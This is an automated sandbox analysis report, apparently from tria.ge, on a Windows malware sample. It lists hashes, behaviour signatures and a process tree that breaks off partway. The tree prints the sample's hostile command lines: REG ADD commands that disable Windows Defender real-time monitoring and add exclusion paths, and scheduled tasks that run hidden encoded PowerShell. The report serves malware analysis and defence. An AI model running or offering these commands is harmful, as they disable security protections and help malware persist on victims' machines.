Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 118s
max time network: 122s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 21/11/2023, 10:15
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20231020-en
General
Target: file.exe
Size: 7.1MB
MD5: 148ac3c1dd4761fb48f2c92be04ece34
SHA1: 462c861101813339b423b3db9575d2c692ec758d
SHA256: 44d099fe20a392c3e647a6a589f20923cb7937931c6ff379828661e129110979
SHA512: 5ef132edb43bdba2b634a2d914e59be47941b3644cdbf8bc8e271d95b851208b7da4c49defafe3b30550e9489a172ebfaf77b5af1900ed993f40010bc34c6108
SSDEEP: 196608:91O1TzDtD7vGjEjmlZ7NSTcaUI/8Rxa8NIKC3K4kIKld:3OPD7vMPlRPa/URj+KQKxld
Malware Config
Signatures
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Blocklisted process makes network request (1 IoC)
flow | pid | Process
24 | 2908 | rundll32.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Control Panel\International\Geo\Nation | nVdChUm.exe
Executes dropped EXE (4 IoCs)
pid | Process
2140 | Install.exe
2120 | Install.exe
1036 | eGpoUau.exe
2932 | nVdChUm.exe
Loads dropped DLL (12 IoCs)
pid | Process
2032 | file.exe
2140 | Install.exe
2140 | Install.exe
2140 | Install.exe
2140 | Install.exe
2120 | Install.exe
2120 | Install.exe
2120 | Install.exe
2908 | rundll32.exe
2908 | rundll32.exe
2908 | rundll32.exe
2908 | rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension (2 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | nVdChUm.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | nVdChUm.exe
Drops file in System32 directory (21 IoCs)
Drops file in Program Files directory (13 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\VruDcINppTZNIqemGVR\FlHfZUQ.xml | nVdChUm.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | nVdChUm.exe
File created | C:\Program Files (x86)\kTkhuvRgNyZU2\CICKOMF.xml | nVdChUm.exe
File created | C:\Program Files (x86)\nLtdqPxSU\ZTIPqGn.xml | nVdChUm.exe
File created | C:\Program Files (x86)\NWoXnskKXdJGC\BOnjvVQ.xml | nVdChUm.exe
File created | C:\Program Files (x86)\kTkhuvRgNyZU2\TnZoYvDrneThV.dll | nVdChUm.exe
File created | C:\Program Files (x86)\qnfVUcymejUn\LSYfmmL.dll | nVdChUm.exe
File created | C:\Program Files (x86)\nLtdqPxSU\novreh.dll | nVdChUm.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | nVdChUm.exe
File created | C:\Program Files (x86)\VruDcINppTZNIqemGVR\zpRaecl.dll | nVdChUm.exe
File created | C:\Program Files (x86)\NWoXnskKXdJGC\RJVLHnZ.dll | nVdChUm.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | nVdChUm.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | nVdChUm.exe
Drops file in Windows directory (4 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\bfQCIeAfoMUjiMvHpK.job | schtasks.exe
File created | C:\Windows\Tasks\PYxBkvPuMRnFgrady.job | schtasks.exe
File created | C:\Windows\Tasks\puEiLMJPChlWPyy.job | schtasks.exe
File created | C:\Windows\Tasks\UlrsxbhsbQOtZaLyo.job | schtasks.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTP, 13 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
768 | schtasks.exe
304 | schtasks.exe
2820 | schtasks.exe
2600 | schtasks.exe
2528 | schtasks.exe
2468 | schtasks.exe
2256 | schtasks.exe
1732 | schtasks.exe
1728 | schtasks.exe
1772 | schtasks.exe
1644 | schtasks.exe
2740 | schtasks.exe
1596 | schtasks.exe
Enumerates system info in registry (2 TTPs, 4 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS (64 IoCs)
Suspicious behavior: EnumeratesProcesses (29 IoCs)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3024 | powershell.EXE
Token: SeDebugPrivilege | 1856 | powershell.EXE
Token: SeDebugPrivilege | 1700 | powershell.EXE
Token: SeDebugPrivilege | 1416 | powershell.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
[1] C:\Users\Admin\AppData\Local\Temp\file.exe (PID 2032)
    command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\7zS5F40.tmp\Install.exe (PID 2140)
        command line: .\Install.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        [3] C:\Users\Admin\AppData\Local\Temp\7zS6152.tmp\Install.exe (PID 2120)
            command line: .\Install.exe /TdidFGK "525403" /S
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in System32 directory
            - Enumerates system info in registry
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\forfiles.exe (PID 2932)
                command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\SysWOW64\cmd.exe (PID 2756)
                    command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory
                    [6] \??\c:\windows\SysWOW64\reg.exe (PID 2748)
                        command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                    [6] \??\c:\windows\SysWOW64\reg.exe (PID 2696)
                        command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            [4] C:\Windows\SysWOW64\forfiles.exe (PID 2684)
                command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\SysWOW64\cmd.exe (PID 2752)
                    command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory
                    [6] \??\c:\windows\SysWOW64\reg.exe (PID 2632)
                        command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                    [6] \??\c:\windows\SysWOW64\reg.exe (PID 2584)
                        command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    [6] C:\Windows\SysWOW64\reg.exe (PID 1952)
                        command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
            [4] C:\Windows\SysWOW64\schtasks.exe (PID 2600)
                command line: schtasks /CREATE /TN "gyGKnkDCr" /SC once /ST 02:27:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
                - Creates scheduled task(s)
            [4] C:\Windows\SysWOW64\schtasks.exe (PID 2660)
                command line: schtasks /run /I /tn "gyGKnkDCr"
            [4] C:\Windows\SysWOW64\schtasks.exe (PID 804)
                command line: schtasks /DELETE /F /TN "gyGKnkDCr"
            [4] C:\Windows\SysWOW64\schtasks.exe (PID 2528)
                command line: schtasks /CREATE /TN "bfQCIeAfoMUjiMvHpK" /SC once /ST 10:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\eGpoUau.exe\" Xd /Jtsite_idOcH 525403 /S" /V1 /F
                - Drops file in Windows directory
                - Creates scheduled task(s)
C:\Windows\system32\taskeng.exe
taskeng.exe {57DD4465-7BE9-485B-A2F9-6CD101B5DE8C} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]
PID:3012

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3024

    C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    PID:868

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1856

    C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    PID:564

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1700

    C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    PID:552

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416

    C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    PID:1064

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
PID:844

C:\Windows\system32\taskeng.exe
taskeng.exe {C9E64632-ED60-408E-8B3B-009ABFE6B363} S-1-5-18:NT AUTHORITY\System:Service:
PID:1820

  C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\eGpoUau.exe
  C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\eGpoUau.exe Xd /Jtsite_idOcH 525403 /S
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1036

    C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gyiaXfILo" /SC once /ST 09:19:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
    PID:2256

    C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gyiaXfILo"
    PID:2392

    C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gyiaXfILo"
    PID:2132

    C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    PID:1292

      C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      - Modifies Windows Defender Real-time Protection settings
      PID:1256

    C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    PID:2156

      C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      - Modifies Windows Defender Real-time Protection settings
      PID:1648

    C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gsHMABIBF" /SC once /ST 01:10:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
    PID:768

    C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gsHMABIBF"
    PID:1268

    C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gsHMABIBF"
    PID:1472

    C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:32
    PID:2192

      C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:2160

    C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:64
    PID:2872

      C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:108

    C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:32
    PID:1288

      C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:32
      PID:3004

    C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:64
    PID:2084

      C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:64
      PID:2772

    C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\prcciRLxuAmrJUJV\DwomsIqK\zuYzBSDJApUyPeYl.wsf"
    PID:2876

    C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\prcciRLxuAmrJUJV\DwomsIqK\zuYzBSDJApUyPeYl.wsf"
    - Modifies data under HKEY_USERS
    PID:2840

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:2620

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:2748

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:2608

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:2720

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:2724

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:1952

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:2604

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:2660

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:440

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:2316

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:1344

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:2644

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:3024

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:1976

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:2356

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:2524

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass
      PID:1004

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass
      PID:1972

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:64
      PID:368

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:32
      PID:1800

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:32
      PID:1560

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:64
      PID:1536

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:32
      PID:2956

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:64
      PID:1696

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:32
      PID:1068

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:64
      PID:2380

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:32
      PID:2500

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:64
      PID:2100

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:32
      PID:1528

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:64
      PID:2304

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      PID:1760

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      PID:2132

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:32
      PID:960

      C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:64
      PID:1612

      C:\Windows\SysWOW64\reg.exe
